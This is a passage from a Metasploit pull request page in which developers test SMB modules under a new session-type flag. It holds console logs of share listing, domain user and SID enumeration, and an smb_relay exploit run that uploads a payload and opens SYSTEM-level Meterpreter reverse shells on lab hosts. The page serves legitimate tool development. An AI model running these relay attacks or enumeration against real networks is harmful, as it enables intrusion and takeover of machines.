 DIR   vb.local  2022-09-15T15:19:10+01:00  2022-09-15T15:19:10+01:00  2022-09-15T15:19:10+01:00  2022-09-15T15:19:21+01:00

[+] 192.168.175.214:445 -  \\VB\SYSVOL\vb.local
=====================

 Type  Name         Created                    Accessed                   Written                    Changed                    Size
 ----  ----         -------                    --------                   -------                    -------                    ----
 DIR   DfsrPrivate  2022-09-15T15:25:38+01:00  2022-09-15T15:25:38+01:00  2022-09-15T15:25:38+01:00  2023-12-11T11:27:10+00:00
 DIR   Policies     2022-09-15T15:19:17+01:00  2022-09-16T10:42:26+01:00  2022-09-16T10:42:26+01:00  2022-09-16T10:42:26+01:00
 DIR   scripts      2022-09-15T15:19:10+01:00  2022-09-15T15:19:10+01:00  2022-09-15T15:19:10+01:00  2022-09-15T15:19:21+01:00

[+] 192.168.175.214:445 -  \\VB\SYSVOL\vb.local\DfsrPrivate
=================================

 Type  Name                Created                    Accessed                   Written                    Changed                    Size
 ----  ----                -------                    --------                   -------                    -------                    ----
 DIR   ConflictAndDeleted  2022-09-15T15:25:38+01:00  2022-09-15T15:25:38+01:00  2022-09-15T15:25:38+01:00  2023-12-11T11:27:10+00:00
 DIR   Deleted             2022-09-15T15:25:38+01:00  2022-09-15T15:25:38+01:00  2022-09-15T15:25:38+01:00  2023-12-11T11:27:10+00:00
 DIR   Installing          2022-09-15T15:25:38+01:00  2022-09-15T15:25:38+01:00  2022-09-15T15:25:38+01:00  2023-12-11T11:27:10+00:00

[+] 192.168.175.214:445 -  \\VB\SYSVOL\vb.local\Policies
==============================

 Type  Name                                    Created                    Accessed                   Written                    Changed                    Size
 ----  ----                                    -------                    --------                   -------                    -------                    ----
 DIR   {31B2F340-016D-11D2-945F-00C04FB984...  2022-09-15T15:19:17+01:00  2022-09-15T15:19:17+01:00  2022-09-15T15:19:17+01:00  2022-09-15T15:19:21+01:00
 DIR   {6AC1786C-016F-11D2-945F-00C04fB984...  2022-09-15T15:19:17+01:00  2022-09-15T15:19:17+01:00  2022-09-15T15:19:17+01:00  2022-09-15T15:19:21+01:00
 DIR   {6C3AD78B-3ABD-4636-8493-C6D7D9C5A4...  2022-09-16T10:42:26+01:00  2022-09-16T10:42:26+01:00  2022-09-16T10:42:26+01:00  2022-09-16T10:42:26+01:00

[+] 192.168.175.214:445 -  \\VB\SYSVOL\vb.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}
=====================================================================

 Type  Name     Created                    Accessed                   Written                    Changed                    Size
 ----  ----     -------                    --------                   -------                    -------                    ----
 DIR   MACHINE  2022-09-15T15:19:17+01:00  2022-09-15T15:26:41+01:00  2022-09-15T15:26:41+01:00  2022-09-15T15:26:41+01:00
 DIR   USER     2022-09-15T15:19:17+01:00  2022-09-15T15:19:17+01:00  2022-09-15T15:19:17+01:00  2022-09-15T15:19:21+01:00
 FILE  GPT.INI  2022-09-15T15:19:17+01:00  2022-09-15T15:26:41+01:00  2022-09-15T15:26:41+01:00  2022-09-15T15:26:41+01:00  22

[+] 192.168.175.214:445 -  \\VB\SYSVOL\vb.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}
=====================================================================

 Type  Name     Created                    Accessed                   Written                    Changed                    Size
 ----  ----     -------                    --------                   -------                    -------                    ----
 DIR   MACHINE  2022-09-15T15:19:17+01:00  2022-09-15T15:19:17+01:00  2022-09-15T15:19:17+01:00  2022-09-15T15:19:21+01:00
 DIR   USER     2022-09-15T15:19:17+01:00  2022-09-15T15:19:17+01:00  2022-09-15T15:19:17+01:00  2022-09-15T15:19:21+01:00
 FILE  GPT.INI  2022-09-15T15:19:17+01:00  2023-09-05T15:33:36+01:00  2023-09-05T15:33:36+01:00  2023-09-05T15:33:36+01:00  22

[+] 192.168.175.214:445 -  \\VB\SYSVOL\vb.local\Policies\{6C3AD78B-3ABD-4636-8493-C6D7D9C5A471}
=====================================================================

 Type  Name     Created                    Accessed                   Written                    Changed                    Size
 ----  ----     -------                    --------                   -------                    -------                    ----
 DIR   Machine  2022-09-16T10:42:26+01:00  2022-09-16T10:42:26+01:00  2022-09-16T10:42:26+01:00  2022-09-16T10:42:26+01:00
 DIR   User     2022-09-16T10:42:26+01:00  2022-09-16T10:42:26+01:00  2022-09-16T10:42:26+01:00  2022-09-16T10:42:26+01:00
 FILE  GPT.INI  2022-09-16T10:42:26+01:00  2022-09-16T10:42:26+01:00  2022-09-16T10:42:26+01:00  2022-09-16T10:42:26+01:00  59

[+] 192.168.175.214:445 -  \\VB\SYSVOL\vb.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE
=============================================================================

 Type  Name          Created                    Accessed                   Written                    Changed                    Size
 ----  ----          -------                    --------                   -------                    -------                    ----
 DIR   Microsoft     2022-09-15T15:19:17+01:00  2022-09-15T15:19:17+01:00  2022-09-15T15:19:17+01:00  2022-09-15T15:19:21+01:00
 FILE  Registry.pol  2022-09-15T15:26:41+01:00  2022-09-15T15:26:41+01:00  2022-09-15T15:26:41+01:00  2022-09-15T15:26:41+01:00  2780

[+] 192.168.175.214:445 -  \\VB\SYSVOL\vb.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE
=============================================================================

 Type  Name       Created                    Accessed                   Written                    Changed                    Size
 ----  ----       -------                    --------                   -------                    -------                    ----
 DIR   Microsoft  2022-09-15T15:19:17+01:00  2022-09-15T15:19:17+01:00  2022-09-15T15:19:17+01:00  2022-09-15T15:19:21+01:00

[+] 192.168.175.214:445 -  \\VB\SYSVOL\vb.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft
=======================================================================================

 Type  Name        Created                    Accessed                   Written                    Changed                    Size
 ----  ----        -------                    --------                   -------                    -------                    ----
 DIR   Windows NT  2022-09-15T15:19:17+01:00  2022-09-15T15:19:17+01:00  2022-09-15T15:19:17+01:00  2022-09-15T15:19:21+01:00

[+] 192.168.175.214:445 -  \\VB\SYSVOL\vb.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft
=======================================================================================

 Type  Name        Created                    Accessed                   Written                    Changed                    Size
 ----  ----        -------                    --------                   -------                    -------                    ----
 DIR   Windows NT  2022-09-15T15:19:17+01:00  2022-09-15T15:19:17+01:00  2022-09-15T15:19:17+01:00  2022-09-15T15:19:21+01:00

[+] 192.168.175.214:445 -  \\VB\SYSVOL\vb.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT
==================================================================================================

 Type  Name     Created                    Accessed                   Written                    Changed                    Size
 ----  ----     -------                    --------                   -------                    -------                    ----
 DIR   SecEdit  2022-09-15T15:19:17+01:00  2022-09-15T15:19:17+01:00  2022-09-15T15:19:17+01:00  2022-09-15T15:19:21+01:00

[+] 192.168.175.214:445 -  \\VB\SYSVOL\vb.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT
==================================================================================================

 Type  Name     Created                    Accessed                   Written                    Changed                    Size
 ----  ----     -------                    --------                   -------                    -------                    ----
 DIR   SecEdit  2022-09-15T15:19:17+01:00  2023-09-05T15:33:44+01:00  2023-09-05T15:33:36+01:00  2023-09-05T15:33:36+01:00

[+] 192.168.175.214:445 -  \\VB\SYSVOL\vb.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit
==========================================================================================================

 Type  Name         Created                    Accessed                   Written                    Changed                    Size
 ----  ----         -------                    --------                   -------                    -------                    ----
 FILE  GptTmpl.inf  2022-09-15T15:19:17+01:00  2022-09-15T15:19:17+01:00  2022-09-15T15:19:17+01:00  2022-09-15T15:19:21+01:00  1098

[+] 192.168.175.214:445 -  \\VB\SYSVOL\vb.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit
==========================================================================================================

 Type  Name         Created                    Accessed                   Written                    Changed                    Size
 ----  ----         -------                    --------                   -------                    -------                    ----
 FILE  GptTmpl.inf  2022-09-15T15:19:17+01:00  2023-09-05T15:33:36+01:00  2023-09-05T15:33:36+01:00  2023-09-05T15:33:36+01:00  6074

[+] 192.168.175.214:445 - info saved in: /Users/cgranleese/.msf4/loot/20231212151753_default_192.168.175.214_smb.enumshares_526427.txt
[*] 192.168.175.214: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

scanner/smb/smb_enumusers

features set smb_session_type false

msf6 auxiliary(scanner/smb/smb_enumusers) > run

[+] 192.168.175.214:445 - VB [ Administrator, Guest, krbtgt, foo, j.bloggs, w�th.d���ritica, sshd ] ( LockoutTries=0 PasswordMin=7 )
[*] 192.168.175.214: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

features set smb_session_type true

msf6 auxiliary(scanner/smb/smb_enumusers) > run

[+] 192.168.175.214:445 - VB [ Administrator, Guest, krbtgt, foo, j.bloggs, w�th.d���ritica, sshd ] ( LockoutTries=0 PasswordMin=7 )
[*] 192.168.175.214: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

scanner/smb/smb_enumusers_domain

features set smb_session_type false

msf6 auxiliary(scanner/smb/smb_enumusers_domain) > run

Login Failed: Unable to negotiate SMB1 with the remote host: Not a valid SMB packet
[*] 192.168.175.214:445 - VB\Administrator, VB\DC1$, VB\DC1$, VB\DC1$, VB\DC1$, VB\DC1$, VB\DC1$, VB\DC1$, VB\DC1$, VB\DC1$, VB\DC1$, VB\DC1$, VB\DC1$, VB\DC1$, VB\DC1$
[+] 192.168.175.214:445 - Found user: VB\Administrator
[*] 192.168.175.214: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

features set smb_session_type true

runmsf6 auxiliary(scanner/smb/smb_enumusers_domain) > run

Login Failed: Unable to negotiate SMB1 with the remote host: Not a valid SMB packet
[*] 192.168.175.214:445 - VB\Administrator, VB\DC1$, VB\DC1$, VB\DC1$, VB\DC1$, VB\DC1$, VB\DC1$, VB\DC1$, VB\DC1$, VB\DC1$, VB\DC1$, VB\DC1$, VB\DC1$, VB\DC1$, VB\DC1$
[+] 192.168.175.214:445 - Found user: VB\Administrator
[*] 192.168.175.214: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

scanner/smb/smb_lookupsid

features set smb_session_type false

msf6 auxiliary(scanner/smb/smb_lookupsid) > run

[*] 192.168.175.214:445 - PIPE(LSARPC) LOCAL(VB - 5-21-1975591874-2236985952-3915871362) DOMAIN(VB - 5-21-1975591874-2236985952-3915871362)
[*] 192.168.175.214:445 - USER=Administrator RID=500
[*] 192.168.175.214:445 - USER=Guest RID=501
[*] 192.168.175.214:445 - USER=krbtgt RID=502
[*] 192.168.175.214:445 - GROUP=Domain Admins RID=512
[*] 192.168.175.214:445 - GROUP=Domain Users RID=513
[*] 192.168.175.214:445 - GROUP=Domain Guests RID=514
[*] 192.168.175.214:445 - GROUP=Domain Computers RID=515
[*] 192.168.175.214:445 - GROUP=Domain Controllers RID=516
[*] 192.168.175.214:445 - TYPE=4 NAME=Cert Publishers rid=517
[*] 192.168.175.214:445 - GROUP=Schema Admins RID=518
[*] 192.168.175.214:445 - GROUP=Enterprise Admins RID=519
[*] 192.168.175.214:445 - GROUP=Group Policy Creator Owners RID=520
[*] 192.168.175.214:445 - GROUP=Read-only Domain Controllers RID=521
[*] 192.168.175.214:445 - GROUP=Cloneable Domain Controllers RID=522
[*] 192.168.175.214:445 - GROUP=Protected Users RID=525
[*] 192.168.175.214:445 - GROUP=Key Admins RID=526
[*] 192.168.175.214:445 - GROUP=Enterprise Key Admins RID=527
[*] 192.168.175.214:445 - TYPE=4 NAME=RAS and IAS Servers rid=553
[*] 192.168.175.214:445 - TYPE=4 NAME=Allowed RODC Password Replication Group rid=571
[*] 192.168.175.214:445 - TYPE=4 NAME=Denied RODC Password Replication Group rid=572
[*] 192.168.175.214:445 - USER=foo RID=1000
[*] 192.168.175.214:445 - USER=DC1$ RID=1001
[*] 192.168.175.214:445 - TYPE=4 NAME=DnsAdmins rid=1102
[*] 192.168.175.214:445 - GROUP=DnsUpdateProxy RID=1103
[*] 192.168.175.214:445 - USER=j.bloggs RID=1105
[*] 192.168.175.214:445 - GROUP=Production RID=1106
[*] 192.168.175.214:445 - USER=w�th.d���ritica RID=1107
[*] 192.168.175.214:445 - TYPE=4 NAME=docker-users rid=1108
[*] 192.168.175.214:445 - TYPE=4 NAME=SQLServer2005SQLBrowserUser$DC1 rid=1109
[*] 192.168.175.214:445 - USER=FOO$ RID=1602
[*] 192.168.175.214:445 - USER=BAR$ RID=1603
[*] 192.168.175.214:445 - USER=TEST$ RID=1604
[*] 192.168.175.214:445 - USER=sshd RID=1608
[*] 192.168.175.214:445 - VB [Administrator, Guest, krbtgt, foo, DC1$, j.bloggs, w�th.d���ritica, FOO$, BAR$, TEST$, sshd ]
[*] 192.168.175.214: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

features set smb_session_type true

msf6 auxiliary(scanner/smb/smb_lookupsid) > run

[*] 192.168.175.214:445 - PIPE(LSARPC) LOCAL(VB - 5-21-1975591874-2236985952-3915871362) DOMAIN(VB - 5-21-1975591874-2236985952-3915871362)
[*] 192.168.175.214:445 - USER=Administrator RID=500
[*] 192.168.175.214:445 - USER=Guest RID=501
[*] 192.168.175.214:445 - USER=krbtgt RID=502
[*] 192.168.175.214:445 - GROUP=Domain Admins RID=512
[*] 192.168.175.214:445 - GROUP=Domain Users RID=513
[*] 192.168.175.214:445 - GROUP=Domain Guests RID=514
[*] 192.168.175.214:445 - GROUP=Domain Computers RID=515
[*] 192.168.175.214:445 - GROUP=Domain Controllers RID=516
[*] 192.168.175.214:445 - TYPE=4 NAME=Cert Publishers rid=517
[*] 192.168.175.214:445 - GROUP=Schema Admins RID=518
[*] 192.168.175.214:445 - GROUP=Enterprise Admins RID=519
[*] 192.168.175.214:445 - GROUP=Group Policy Creator Owners RID=520
[*] 192.168.175.214:445 - GROUP=Read-only Domain Controllers RID=521
[*] 192.168.175.214:445 - GROUP=Cloneable Domain Controllers RID=522
[*] 192.168.175.214:445 - GROUP=Protected Users RID=525
[*] 192.168.175.214:445 - GROUP=Key Admins RID=526
[*] 192.168.175.214:445 - GROUP=Enterprise Key Admins RID=527
[*] 192.168.175.214:445 - TYPE=4 NAME=RAS and IAS Servers rid=553
[*] 192.168.175.214:445 - TYPE=4 NAME=Allowed RODC Password Replication Group rid=571
[*] 192.168.175.214:445 - TYPE=4 NAME=Denied RODC Password Replication Group rid=572
[*] 192.168.175.214:445 - USER=foo RID=1000
[*] 192.168.175.214:445 - USER=DC1$ RID=1001
[*] 192.168.175.214:445 - TYPE=4 NAME=DnsAdmins rid=1102
[*] 192.168.175.214:445 - GROUP=DnsUpdateProxy RID=1103
[*] 192.168.175.214:445 - USER=j.bloggs RID=1105
[*] 192.168.175.214:445 - GROUP=Production RID=1106
[*] 192.168.175.214:445 - USER=w�th.d���ritica RID=1107
[*] 192.168.175.214:445 - TYPE=4 NAME=docker-users rid=1108
[*] 192.168.175.214:445 - TYPE=4 NAME=SQLServer2005SQLBrowserUser$DC1 rid=1109
[*] 192.168.175.214:445 - USER=FOO$ RID=1602
[*] 192.168.175.214:445 - USER=BAR$ RID=1603
[*] 192.168.175.214:445 - USER=TEST$ RID=1604
[*] 192.168.175.214:445 - USER=sshd RID=1608
[*] 192.168.175.214:445 - VB [Administrator, Guest, krbtgt, foo, DC1$, j.bloggs, w�th.d���ritica, FOO$, BAR$, TEST$, sshd ]
[*] 192.168.175.214: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

windows/smb/smb_relay

features set smb_session_type false

msf6 exploit(windows/smb/smb_relay) > run relay_targets=192.168.175.193 username=foo password=password smbshare=my_share
[*] Exploit running as background job 17.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.175.1:4444
msf6 exploit(windows/smb/smb_relay) > [*] SMB Server is running. Listening on 0.0.0.0:445
[*] Server started.
[*] New request from 192.168.175.198
[*] Received request for \foo
[*] Relaying to next target smb://192.168.175.193:445
[+] identity: \foo - Successfully authenticated against relay target smb://192.168.175.193:445
[*] Received request for \foo
[*] identity: \foo - All targets relayed to
[*] 192.168.175.193:445 - Selecting native target
[*] 192.168.175.193:445 - Uploading payload... HoeADbte.exe
[*] 192.168.175.193:445 - Created \HoeADbte.exe...
[*] Sending stage (175686 bytes) to 192.168.175.193
[+] 192.168.175.193:445 - Service started successfully...
[*] 192.168.175.193:445 - Deleting \HoeADbte.exe...
[*] Meterpreter session 3 opened (192.168.175.1:4444 -> 192.168.175.193:50459) at 2024-01-10 11:47:45 +0000

msf6 exploit(windows/smb/smb_relay) > sessions

Active sessions
===============

  Id  Name  Type                     Information                            Connection
  --  ----  ----                     -----------                            ----------
  3         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ DESKTOP-DRQ7J9D  192.168.175.1:4444 -> 192.168.175.193:50459 (192.168.175.193)

features set smb_session_type true
Assuming this should have opened as an smb session type?

msf6 exploit(windows/smb/smb_relay) > run relay_targets=192.168.175.193 username=foo password=password smbshare=my_share
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.175.1:4444
msf6 exploit(windows/smb/smb_relay) > [*] SMB Server is running. Listening on 0.0.0.0:445
[*] Server started.
[*] New request from 192.168.175.198
[*] Received request for \foo
[*] Relaying to next target smb://192.168.175.193:445
[+] identity: \foo - Successfully authenticated against relay target smb://192.168.175.193:445
[*] Received request for \foo
[*] identity: \foo - All targets relayed to
[*] 192.168.175.193:445 - Selecting native target
[*] 192.168.175.193:445 - Uploading payload... nnrKMaEd.exe
[*] 192.168.175.193:445 - Created \nnrKMaEd.exe...
[*] Sending stage (175686 bytes) to 192.168.175.193
[+] 192.168.175.193:445 - Service started successfully...
[*] 192.168.175.193:445 - Deleting \nnrKMaEd.exe...
[*] Meterpreter session 1 opened (192.168.175.1:4444 -> 192.168.175.193:50477) at 2024-01-10 11:52:53 +0000

msf6 exploit(windows/smb/smb_relay) > sessions

Active sessions
===============

  Id  Name  Type                     Information                            Connection
  --  ----  ----                     -----------                            ----------
  1         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ DESKTOP-DRQ7J9D  192.168.175.1:4444 -> 192.168.175.193:50477 (192.168.175.193)

@adfoster-r7
Copy link
Contributor

This pull request is still a work in progress
Draft pull requests cannot be merged.

@dwelch-r7 Is this ready for review now? 👀

@dwelch-r7 dwelch-r7 marked this pull request as ready for review January 3, 2024 12:30
@dwelch-r7
Copy link
Contributor Author

This pull request is still a work in progress
Draft pull requests cannot be merged.

@dwelch-r7 Is this ready for review now? 👀

Sure is, undrafted

@adfoster-r7 adfoster-r7 merged commit 0075212 into rapid7:master Jan 15, 2024
57 checks passed
@adfoster-r7
Copy link
Contributor

Release Notes

Updates multiple SMB modules to work with the new upcoming SMB session type support. This beta functionality is currently behind a feature flag, and can be enabled with features set smb_session_type true

@bwatters-r7 bwatters-r7 added the rn-enhancement release notes enhancement label Jan 19, 2024
@dwelch-r7 dwelch-r7 mentioned this pull request May 9, 2024
Merged
12 tasks
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@adfoster-r7 adfoster-r7 adfoster-r7 left review comments

Assignees

@cgranleese-r7 cgranleese-r7

Labels
rn-enhancement release notes enhancement
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
4 participants
@dwelch-r7 @cgranleese-r7 @adfoster-r7 @bwatters-r7